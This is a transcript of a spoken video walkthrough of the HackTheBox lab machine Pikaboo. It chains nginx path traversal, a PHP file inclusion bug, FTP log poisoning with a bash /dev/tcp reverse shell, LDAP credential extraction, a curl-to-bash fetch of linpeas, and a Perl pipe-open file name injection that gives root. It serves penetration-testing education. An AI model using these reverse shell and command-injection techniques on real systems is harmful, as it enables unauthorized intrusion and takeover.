What's going on YouTube? This is Ibzak, and we're doing Pikaboo from HackTheBox, and I really like this box because of all the enumeration that you have to do in order to get a low privilege shell on the box. First, you run nmap and discover the web server is nginx based upon the headers. However, whenever you create an error message on the website, it's an Apache error message, not nginx. So you know nginx is running in some type of reverse proxy configuration. Looking at gobuster output, you see admin anything returns the same exact thing. So it looks like the location header in nginx is misconfigured. You try admin ... and discover there is path traversal there, which allows you to access server-status, which is an Apache thing that will leak some open files, most notably the admin_staging directory. You do the path traversal to go in there and discover there's an LF5 vulnerability. However, PHP is configured in order to not let you outside of the var directory. But you can access the FTP log through that and chain it together to get code execution. There's a lot more that comes after that I like about this box, but let's just jump in. As always, we're going to start off with an nmap, so -sc for default scripts, sv enumerate versions, oa output all formats, put in the nmap directory and call it Pikaboo, and then the IP address of 10.10.10.249. This can take some time to run, so I've already ran it. Looking at the results, we have just 3 ports open. The first one being FTP on port 21, and it's running vsftpd version 3 point something. And just from doing enough CTFs, I know off the top of my head that there's no real exploit against recent versions of vsftpd. We can do search exploit and see everything is 2 something. We could also test for anonymous login, but nmap does that by default, so nothing really else to test for FTP. The next port is SSH on port 22, and it is telling us it's a Debian server. Then we have HTTP on port 80, and it's telling us it is nginx 1.14.2. The title of the page is saying Pikaboo. There's nothing really else there like cookies or anything, so let's just go take a look at the web page. So 10.10.10.249. And we get a page. The first thing I'm thinking about right now, because I see nginx and this little cat in the top left, is some type of Tomcat server. Looking at the page source to see if there's like anything that indicates like the framework that was used to build it. I don't really see anything. So it just looks like some weird one-page application or a static page. We have Pikaboo. There's some pages here. The Pokedex. I thought I held control when I clicked that and it didn't work. Actually, it doesn't have it open a new tab. That's weird. But just scrolling down, looking at what is on this page, I don't see anything too interesting. We can look at the contact form, or we can just go to these pages at the top left. And we have a /admin that requires authentication. And there's something really weird here. It's telling us it's an Apache server on this error message, 2438 Debian, and it's localhost 81. So there is probably some type of reverse proxy in play with nginx. Nginx is sitting in front of Apache, not exactly sure what its purpose is yet, but that's all we know. We do see this URL is going to .php. We have pokeapi ID = 1. It just says more information coming soon. It left off at 12. I'm going to try like 13. Still more information coming soon. Let's put text in to see if we get an error message. This is always saying coming soon. So I'm not exactly sure what this feature is yet. Let's just do this contact form. Root at ipsec.rocks. Message, please subscribe to ipsec. And then let's send this over to Burp Suite. Intercept is on. And we're not getting anything. I'm going to open up my console tab. See if there's any like weird JavaScript errors. This is contact.php. So it just refreshed the page for something. Probably when I opened this and just went back to the page. Let's look at the network tab when we send this. Nothing. We can look at inspector, look at this code, and it is literally just a button, not really doing anything. So, yeah, that's weird. Let's just run a gobuster so we always have some type of recon going in the background. And I should have did this right at the start because we just lost a few minutes of time where we could have been running this. So u http 10.10.10 249-x for extensions, PHP because we did see the PHP extension, wordlist, opt, seclist, discovery, web content, raft, small words, .text. And we probably should say an out file, so o gobuster.out. And one of the cool things this out file allows us to do, we can turn the intercept off, is view results live like this, and also grep for them. So if we wanted to hide anything that starts with a /dot, because it looks like everything that starts with period goes to a 403, we can easily do that with grep-v, and then a caret, and then we'll do / and then escape period because that's also a special character. And now we have gobuster hiding all of that output, and we can run it a few times to see when new pages come. We have admin.php. It gets us a access denied, so if I try to access admin.php, we get forbidden. Let's see, we have /admin, administrator, administrator.php, admin cp, and it looks like everything with admin is getting matched to something and going to a 401, which is asking for authentication. But we can validate that by doing a bunch of stuff after admin, and we still have authentication required. And I'm thinking of a old attack in nginx now. If you do like nginx, how it does the forwarding, you do location / what it begins with. And if you do this, it's going to match anything that begins with /admin. And that's probably why we're seeing all of this. If you want to protect a directory, you should always put a trailing / here. Otherwise, you may be open to this vulnerability, which allows us to do an LFI to the, I think, Apache server, or maybe the nginx server. I think it's Apache. But because it's matching this, and if I do like this, I'm in var www HTML, and we can try accessing things like server status is a common page. So we can try that. So admin / server -status, and we have the Apache server stats. So this allows us to see various pages. You can see like when a page is hanging or something, or taking high memory. But for us, it is leaking some locations. So we have this admin staging directory. So if I just go to 10.10.10 249 /admin staging, it's asking for authentication. But if I put the admin /, we can now access this directory. So this is looking interesting. I'm going to do index.php to see if this is indeed a PHP server. It is. So let's run a second gobuster. Whoops, wrong pane. Let's do gobuster dir -u http. I already had HTTP in the clipboard, so we don't have to do that twice. -x php again. -w for wordlist, opt, seclist, discovery, web content, raft, small words, .text, and -o, we'll call this admin staging.out. Also tell us it is gobuster. So now we're running it on this directory. Just clicking around, let's see, edit task, can we do that? Remove. Looks like this is a pretty dead application. We have user.php. We have a potential username, so we could try to do some brute forcing with FTP or SSH right there. Table list. It's got this page thing. We can try testing for LFI. One of the ways I like doing LFI is just testing a PHP filter real quick. So PHP filter, it's convert.base64-encode. Resource is equal to the file name. And we get a bunch of PHP. So we do have some type of LFI here. So echo-n, paste this, base64-d, invalid input. let's see, we can go view source and copy it this way. I may have copied like that /div or something. Echo-n, base64-d. And what I'm looking for here is like a database file. Normally there's like require config.php or db.php somewhere, or maybe an include statement. So looking at this, I don't really see anything. What I'm going to do is just search for PHP tags first. Did that break my tmux? My tmux is not responding. File, open tab, tmux. I have no idea what just happened there. So I'm going to pause the video and fix up tmux. Okay, I'm back. I had to do a pkill-9 on tmux, which involved restarting the VPN, so I decided I just want to do that off of recording. So let's copy this base64 command again. And this time I'm going to save it to a file and use grep, because apparently tmux did not like whatever search I did. That was a weird issue that I'm surprised I haven't encountered before. Let's see, base64-d to index.php, and let's make dir source and copy that file into the source. And let's see, I'm going to search for like require, file, get contents, not there, include, we have include a few times, and we can see it's including get page else dashboard.php. So let's see, this admin staging, this is dashboard.php, and since it's doing an include on page, we probably have some type of LFI. Let's try getting like etsy passwd. So etsy passwd. We don't need to view source. It's easier to see if it worked because the page will appear here. Let's see. That's ver www html admin. So maybe we're one directory too high. No. Let's do this. So this is weird. There's no filters on that. Like we saw, it's literally if is set include, but we can't get etsy passwd. What I'm going to do is just try ver. Let's see. It's ver www html. We're probably in admin staging index.php. Does that exist? It does not. Or maybe we are going through burp suite. No. Oh, we hung. Let's try /dashboard.php. And we can pull the page. So we know LFI works. We just couldn't get to the Etsy directory. I'm guessing there's some PHP herning applied to this server. But normally when I have this type of LFI, the good way to find out how to weaponize it is to do another gobuster. So let's do, let's see, cd opt seclist, find .grep-i LFI. And we can use this Graceful Security Linux list. If I just less it, we can look at it. And we got a lot of things, varlog, and just a lot of files in general. So this is a good word list to use once you have a LFI. And if we had gobustered this whole thing, we'd probably find info.php. I was running gobuster here, but remember my tmux crashed, which did crash gobuster and caused all sorts of issues. And I thought it was info.php. Let's turn burp suite off. Admin staging. Not exactly sure, but let's just use this word list. So I'm going to copy this. And we can do wfuzz -u http 10.10.10.249 admin staging, and then we want, what is it? Where is it? I think page equals. Let's go back a few times. I can just copy this. And we'll put fuzz right there, -w for word list, opt seclist, then fuzzing, LFI, graceful security, linux.txt, and it should be running. Can I no longer ping the server? Ping 10.10.10.249. So I think my VPN, I think I'm still having issues from when Tmux crashed, and VPN was probably just running in the background. Let's check info.php real quick. Okay, yep, that was it. So let's see. This tells you the PHP hardening. And we can see open_baster is set to var, which means we won't be able to use PHP to get anything that is not in the var directory. So that's why passwd failed. But our wfuzz should work now. And I'm going to hide characters 15.349. And we're just going to see what payloads are here, which means we have fail log, vsftpd, wtemp, last log. vsftpd is good because we should be able to write directly to this log. We can look at its contents by just doing this. Where is it? Let's go back. So var log vsftpd.log. So we can see the contents. We have a username. Where is it? That's quit. Oh, user anonymous. So this may have been my nmap testing anonymous login. But the key thing here is we can put anything into this because FTP is open to us. So we can put a PHP shell here. And because it is included, I forget exactly where that was. If we less index.php. Let's see. And because it is included, it's going to execute anything in PHP tags. So I'm going to create a PHP one-liner. So we want PHP system, then --c, --i. We can do, --c, and then put the single quotes there, --i. Dev TCP 10.10.14.8 9001 0 and 1, like that. And I think this will execute. So what I'm going to do is test this out first. So we can do nclvnp 9001 and php-a to get into interactive mode. I forget exactly what the A stands for. However, we can just run a single PHP command. And we get the reverse shell, which is good. So we know this command works. Always try testing things out before you throw them. So what I'm going to do is stand up my listener. Then we FTP 10.10.10.249. Log in with our PHP shell. Password doesn't really matter because we just want to create that log entry. And now when I refresh this page, we have a shell as data. So I'm going to do python 3-c import pty.spawn bin bash control Z to background stty raw -echo, then semicolon fg and enter twice. And now we have a reverse shell here where we can tab autocomplete. So the first thing I want to look at is we can go into admin. Is there a .ht access? No. cat.htaccess, not there. Find.grepht. I'm trying to find out what that password is when you try to go to like 10.10.10.249/admin. Trying to find out exactly what this password is because we're on shell in the box. We should be able to find that. I'm going to try checking admin.php. What is admin.php? Find.grep admin.php. I don't see it anywhere. I'm just going to go to Etsy nginx and let's check sites enabled, cat default, and we can see the pages. So this admin, it does have what I suspected. There's no trailing slash here. Artwork does have a trailing slash. It's going to /opt pokeapi. So it looks like maybe there's a Python application running here. And then 81, we have pokedex. I don't see exactly how it's saying that password though. Var www html. Let's check admin. Let's look at index.php. See if there's anything here. Not exactly sure. Let's see. Let's do export term is equal to xterm. This is composer. Let's see. Let's just grep-i password. We need to specify R for recursive. grep-v stir.js. That did not work. We don't really want any of these assets. So I wonder if I just put a star here. Nope, nothing. So there's nothing password in these PHP files. Let's look at user.php. And this isn't straight PHP, which is slightly annoying of looking at. Let's see, grep php user. There's no PHP tags in user at all. So I'm thinking this admin thing is a dead end, even if we can't figure out exactly why it's asking us for authentication. Actually, it's probably Apache. I was looking at I think I was looking at nginx logs, right? I never looked at the Apache of this. Let's see, virtual host 81. Here we go. This is it. The reverse proxy confused me for a second because I was looking at nginx, no, it's forwarding it to Apache and there's nothing here that says there's a password. But I forgot to check the Apache logs. So we can look at this and we do have a credential here. So let's see, v creds.text. Let's move this to hashes. And I just realized the Kraken server is powered off right now, so I won't be able to crack this quickly. So let's just move on, because I don't want to do it on my host machine because it would slow down the video. And I don't think we need to, but this was just enumeration I would have done on this box. If we went back to the nginx, it did point us at opt pokeapi. And if we look at, let's see, find.-name star.py. Is it -name equals? I always screw up find syntax. Find.grep star.py. Wait, what? Find.grep pi. I don't know why that's breaking. Grep anything that ends in py. Okay, here's all the Python files. We do have this config directory, and there is a settings. So let's try config settings. And look at this. It is Django, which is a Python framework. It's using Redis there. And we also have LDAP. So here is the actual, I forget exactly what it's called in LDAP, but the query word user is. So it's like a domain like pikaboo.htb, and it's using this password to log in. So let us grab this. So I'm going to grep bind user on settings.py, and we'll do -a1 for after 1 to get both user and password. So I'm going to exit this, and let's just change it up a little bit. vnotes.text. Let's copy these 2 lines and just paste them here. Okay. So we can do ldapsearch. And then what do we do here? Is it -D, I think, for binding with a distinguished name, which is just a fancy way of saying this string. So we can do this. And then we need -W for the password. I know the ldapsearch syntax is super weird. Like this. And it looks like we authenticate. If we do something wrong, let's see. We get invalid credentials. So we have successfully authenticated. We can do -S base naming context. And this will probably give us Pikaboo HTB. It gives us DC equals HTB. So we can say the base is DC equals HTB. And we have started dumping the whole LDAP. If you want to know more about this, just probably search ldapsearch on ipsec.rocks, or I do it much more. So we have this admin DN, and user password is this base64. Let's echo -n base64-d, and that looks like it is hashed, so we don't have that. Let us do, let's see, I thought I saw another one here. This, check out this user password, echo -n base64-d, and we get a password for pwnmeow. So is there anything else here? We have this. This is the bind user, so this is the password we had been using. Yep, that is the password we already knew. So still, right now, pwnmeows is the interesting one. So let's try doing a su-pwnmeow, logging in, and we get authentication failure. Let's try ssh pwnmeow at 10.10.10.249. And let's see, we still can't log into the box. So testing the clipboard, we have the correct thing. So it's not that. There was a second thing. So we can do ftp 10.10.10.249 because this was also another login. Pwnmeow, paste in the password, and we have authentication successful. And looking at this, we have a lot of text. So I'm going to do a search on ability underscore changelog underscore pros because this looks unique. So find /-name, paste that to dev null. And this is in /sov/ftp. So there's probably something here with this FTP server, but really not sure. Let's run linenum real quick. So cp opt will make dir dub, and cp opt, was it privilege escalation script awesome suite, and then linpeas and linpeas.sh, copy it here, python 3-m http server, and then we can curl 10.10.14.8 port 8000 linpeas.sh, pipe it over to bash, and we'll see exactly what linpeas tells us. So I'm going to pause the video. It'll probably take 30 seconds to run. So right away, linpeas is telling us the ht passwd, but it's not really too interesting to us, so let's search for linpeas.sh. So we go to the very top of the script and work our way down this. I'm just looking for things that are highlighted right now. This beginning stuff isn't really too interesting. It is detecting it is a VM. Available software to us. Here's processes, crons, timers, and service. This is always interesting to look at. So we have a reverse shell there. There's nginx, nothing too interesting. Credentials and memory, cron jobs. So cron D, that's standard. Cron daily, that looks all normal. Hourly, weekly. We have a file that is running every minute, this CSVUpdate.cron. So that is probably interesting. We should go through everything else, just do a due diligence. Looking at the timers, these are all standard. Looking through the rest of this output, the listening ports, we can see LDAP is there. 81 is that Apache. Nothing too interesting here. Log in now. No one's logged in. We can see the last time pwnmeow had logged into the server, so we could also use like the find command and look for files edited around May 10th, and that may show us something to see exactly what pwnmeow was doing on the box that time. PHP exec extensions, this is all just standard. We have permit root login allowed in SSH. Nothing interesting there. Still nothing really interesting. Interesting files. These are all, looks like standard. These are set UID binaries and set GID binaries. IN cron tab, this is an unknown one. This is like a cron, but can execute upon file being modified, which is really cool. So it's essentially cron tab. We can look at IN cron at the end of this video if you want. And nothing really there. So the key thing, I don't know what key I just hit, but it popped up a terminal. The key thing is this user local bin CSV update cron file. So let's cat that. And we can see all this is doing is going into this directory, taking every file, executing against CSV update with this base name command, which I'm guessing is a bash binary. Yep. So it's doing base name, and this probably just gets you the base name of something. So if I do base name serve FTP versions, it's probably just going to give me versions, would be my guess. Yep. So that's what that's doing. So let's go back to cat this. So it's doing base name and then matching everything and CSV. And then doing a RMRF on this SOV-FTP. So let's look at CSV update. So Vim, CSV update. Oh, we don't have Vim. We have VI though. And this is a Perl script. What I'm going to do real quick though is let's copy this over to our machine because we have syntax highlighting, and syntax highlighting is definitely nice. So I'm going to do nc lvnp 9001, and we can cat user local bin CSV update to dev tcp 10.10.14.8 9001. And we should also direct this to a file, so csvupdate.pl. Send it. And now if I vim csvupdate.pl, that looks much better. So it's going into this CSV directory. Bunch of files. Or not files, just like variables. So if argv is less than 1, then die and print out the usage. Now we set argv to type. It's going into CSV directory and type.csv, unable to open. And it's doing a for loop. And I'm guessing this is going to be the file name, because that's probably argv. So I think this is parsing everything in argv is my guess. And argv is passed to be file names. And this is Perl, which this vulnerability is really hard to spot. The only reason I really knew of it is because of an old talk that I've watched 100 times just because it is entertaining. I know I've linked it somewhere in a video. I forget what one. If you search for Pearl Jam and then click on Pearl Jam, not the band, there's 2 talks by this guy. They are both amazing. So definitely go to Explain the 20-Year-Old Vulnerability and then Pearl Jam 2. But essentially how it boils down to is Perl, when you loop through this, it doesn't accept strings unless that string is argv, which I think in this case it is, but also it just wraps around an open command and open on a file stream. And for some reason in Perl, if you open and it begins or ends with a pipe, it executes it instead. Not sure exactly why, but that's what that talk is about. It is the second one, Pearl Jam 2. So when this part confuses you, as it probably should because this is such a weird thing, go reference that talk. So all we have to do is upload a CSV file that begins with a pipe and execute something. So I'm going to go into a new directory, so make dir ftp, and then let us echo bash-c bash-i. Actually, we don't need this because we're going to put it in base64. So bash-i dev tcp 10.10.14.8 9001 0 at and 1. I'm going to put it in single quotes and not double quotes in case anything's a special character I don't want it interpreted. And we can base64-w0. And one thing I generally like doing, it's not required in this case, but I try to get rid of any special character in base64 when I can. So that equal sign is at the end, so if I put a space here, that goes away. But I also want to get rid of this plus. And I'm guessing the plus is either in one of these 2 spots, or actually 3. So I'm going to put a space before the I, and that did get rid of it. However, we now have padding on the end. There is 2 there. If I get rid of that space, it's now a plus here. So again, let's add 3 here. We don't have to add 3 there because the plus is happening before the end of the string. So I'm guessing that's happening where this 0 direct 1 is. There we go. And then we have a padding of 2 with these equals. And here we go. That probably overcomplicated it, but you can play around with base64. If you do it enough, eventually you kind of eyeball it and figure out what to do to make it pure alphanumeric. We can look at it. Still looks like it should work. So now we have to touch a file name. So I'm going to touch and then echo this base64-d and then pipe it over to bash. And it also has to end with CSV. So I'm just going to do a semicolon CSV. And for this touch command to work, we probably want to do 2 dashes to begin with so it doesn't interpret anything as like an argument. So now if I do ls here, we have this super weird file name, and we can also test out the payload by just executing this piece. So if I paste that in, we do nclvmp 9001, echo this, boom, that does work. So the next step is to get into this FTP directory. I'm going to do lcd ftp. And what LCD means is local change directory. So when I ran FTP, I was in this directory. I wanted to move into the FTP directory because that's why I put this weird shell. So I went into the directory. And then the easiest way to put this on the server is just using mput. And we can use a wildcard. Now we don't want to start the shell up right now because the weird thing is it's actually going to execute this. But input echo like that. Not connected. It's weird. Let's just go in the FTP directory. FTP 10.10.10.249. It's pwnmeow. And the password began with _G for gotta catch 'em all. And shoot. I lost the command, but we can just grab it. So home pwnmeow right here. Echo-n. Gotta catch them all. So we logged in successfully. We want to go into the versions directory because that's where the cron actually changed directory into. If I cat etc cron tab, cat user local bin CSVUpdate cron. Let's see. I want to say it went into version somewhere. User local bin CSVUpdate. Or maybe versions where we can write. But let's try doing that input to command again. We can just input echo star. Let's see. There we go. I guess I should not have put it in quotes. So if I try putting this here, we can see it does execute it oddly enough, but it uploads it. If I do a date command here, we can see we have another 9 seconds till a new minute, and it runs it every minute. So hopefully at 16:03 we get a shell, and it doesn't look like we did. Oh, there we go. There's the shell. So here we are. We are now root on Pikaboo. So there was something I wanted to talk about in this video. I forget exactly what it was. But at the start of the video, I said we can look at it in post-root, and then I forgot all about what I said. So I guess that's going to be the video. Hope you guys enjoyed it. Take care, and I will see you all next week.